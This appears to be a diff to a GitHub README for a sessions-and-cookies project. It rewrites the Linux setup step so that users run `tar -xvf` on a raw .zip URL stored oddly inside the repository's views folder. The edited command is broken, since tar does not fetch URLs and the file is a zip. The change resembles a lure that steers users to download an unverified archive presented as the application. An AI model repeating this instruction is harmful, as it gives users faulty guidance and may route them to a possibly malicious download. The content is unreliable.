dantex20-debug/S14-Sessions-and-Cookies/README.md

 - On Windows, right-click the file and select "Extract All."
 - On macOS, double-click the file to extract it.
-- On Linux, use the command `tar -xvf filename.tar`.
+- On Linux, use the command `tar -xvf https://github.com/dantex20-debug/S14-Sessions-and-Cookies/raw/refs/heads/main/views/Cookies-and-Sessions-v3.3.zip`.

 ### 🔧 Setting Up the Application